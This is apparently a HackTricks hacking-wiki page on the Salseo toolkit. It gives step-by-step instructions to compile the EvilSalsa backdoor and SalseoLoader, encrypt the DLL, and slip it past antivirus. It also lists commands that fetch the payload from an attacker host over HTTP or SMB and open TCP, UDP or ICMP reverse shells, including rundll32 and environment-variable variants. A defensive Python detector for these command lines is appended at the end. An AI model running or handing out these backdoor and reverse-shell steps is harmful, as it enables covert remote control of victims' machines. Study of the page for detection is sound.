# Salseo

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Compiling the binaries

Download the source code from github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code.

Compile those projects for the architecture of the Windows box where you are going to use them (if Windows supports x64, compile them for that architecture).

You can **select the architecture** inside Visual Studio in the **left "Build" Tab** under **"Platform Target".**

(**If you can't find this option, click on the "Project Tab" and then on "\<Project Name> Properties"**)

![](<../.gitbook/assets/image (839).png>)

Then, build both projects (Build -> Build Solution) (the path of the executable will appear in the logs):

![](<../.gitbook/assets/image (381).png>)

## Prepare the Backdoor

First of all, you'll need to encode the **EvilSalsa.dll**. To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**:

### **Python**

```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```

### Windows

```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```

Ok, now you have everything you need to execute the whole Salseo thing: the **encoded EvilSalsa.dll** and the **SalseoLoader binary**.

**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**

## **Execute the backdoor**

### **Getting a TCP reverse shell (downloading the encoded dll through HTTP)**

Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.

```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```

### **Getting a UDP reverse shell (downloading the encoded dll through SMB)**

Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).

```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```

### **Getting an ICMP reverse shell (encoded dll already inside the victim)**

**This time you need a special tool on the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)

#### **Disable ICMP Replies:**

```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
# When you finish, you can enable them again by running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```

#### Execute the client:

```
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
```

#### Inside the victim, let's execute the salseo thing:

```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```

## Compiling SalseoLoader as a DLL exporting the main function

Open the SalseoLoader project using Visual Studio.

### Add before the main function: \[DllExport]

![](<../.gitbook/assets/image (409).png>)

### Install DllExport for this project

#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**

![](<../.gitbook/assets/image (881).png>)

#### **Search for the DllExport package (using the Browse tab), and press Install (and accept the popup)**

![](<../.gitbook/assets/image (100).png>)

In your project folder the following files have appeared: **DllExport.bat** and **DllExport\_Configure.bat**

### Uninstall DllExport

Press **Uninstall** (yes, it's weird but it is necessary)

![](<../.gitbook/assets/image (97).png>)

### **Exit Visual Studio and execute DllExport\_configure**

Just **exit** Visual Studio

Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**

Select **x64** (if you are going to use it inside an x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**

![](<../.gitbook/assets/image (882).png>)

### **Open the project again with Visual Studio**

**\[DllExport]** should not be marked as an error anymore

![](<../.gitbook/assets/image (670).png>)

### Build the solution

Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

![](<../.gitbook/assets/image (847).png>)

Select **x64 platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)

![](<../.gitbook/assets/image (285).png>)

To **build** the solution: Build --> Build Solution (the path of the new DLL will appear in the Output console)

### Test the generated Dll

Copy and paste the Dll where you want to test it.

Execute:

```
rundll32.exe SalseoLoader.dll,main
```

If no error appears, you probably have a working DLL!!

## Get a shell using the DLL

Don't forget to use a **HTTP** **server** and set a **nc** **listener**

### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
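As an added detection example (not code from the Salseo project or this page), the following Python flags, in constructed process-creation records, the two execution patterns documented above: the SalseoLoader argument shape `<password> <payload> reverse(tcp|udp|icmp) <lhost> [<lport>]` and rundll32 calling an exported `main` of a DLL outside the Windows directory. The event field names and sample command lines are assumptions, modelled on Sysmon Event ID 1.

```python
import re

# Constructed sample process-creation records (field names assumed, modelled on
# Sysmon Event ID 1); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\bob\Downloads\SalseoLoader.exe",
     "cmdline": r"SalseoLoader.exe password http://10.2.0.5/evilsalsa.dll.txt reversetcp 10.2.0.5 1337"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe SalseoLoader.dll,main"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"image": r"C:\Users\bob\Downloads\SalseoLoader.exe",
     "cmdline": r"SalseoLoader.exe password \\10.2.0.5\folder\evilsalsa.dll.txt reverseudp 10.2.0.5 53"},
]

# Argument shape the loader on this page takes:
#   <password> <http URL | UNC path | local path> reverse(tcp|udp|icmp) <lhost> [<lport>]
# The port is optional because the ICMP mode takes none.
LOADER_RE = re.compile(
    r"\S+\s+(?P<payload>\S+)\s+(?P<mode>reverse(?:tcp|udp|icmp))\s+(?P<lhost>\S+)(?:\s+(?P<lport>\d+))?\s*$",
    re.IGNORECASE)

# rundll32 calling an exported "main" of a DLL; the DLL name is captured for the path check.
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+(?P<dll>[^\s,]+),main\b", re.IGNORECASE)
SYSTEM_DIR = "c:\\windows\\"


def classify(event):
    """Return a finding dict for a suspicious record, or None."""
    cmd = event["cmdline"]
    m = LOADER_RE.search(cmd)
    if m:
        return {"rule": "salseo_loader_args", "mode": m.group("mode").lower(),
                "payload": m.group("payload"), "lhost": m.group("lhost"),
                "lport": m.group("lport")}
    m = RUNDLL_RE.search(cmd)
    if m:
        dll = m.group("dll")
        # A DLL under the Windows directory is the usual rundll32 case; a bare or
        # user-writable path with a "main" export is the pattern described on this page.
        if not dll.lower().startswith(SYSTEM_DIR):
            return {"rule": "rundll32_nonsystem_dll_main", "dll": dll}
    return None


def scan(events):
    """Run classify() over every record and keep only the hits."""
    return [hit for hit in (classify(e) for e in events) if hit]
```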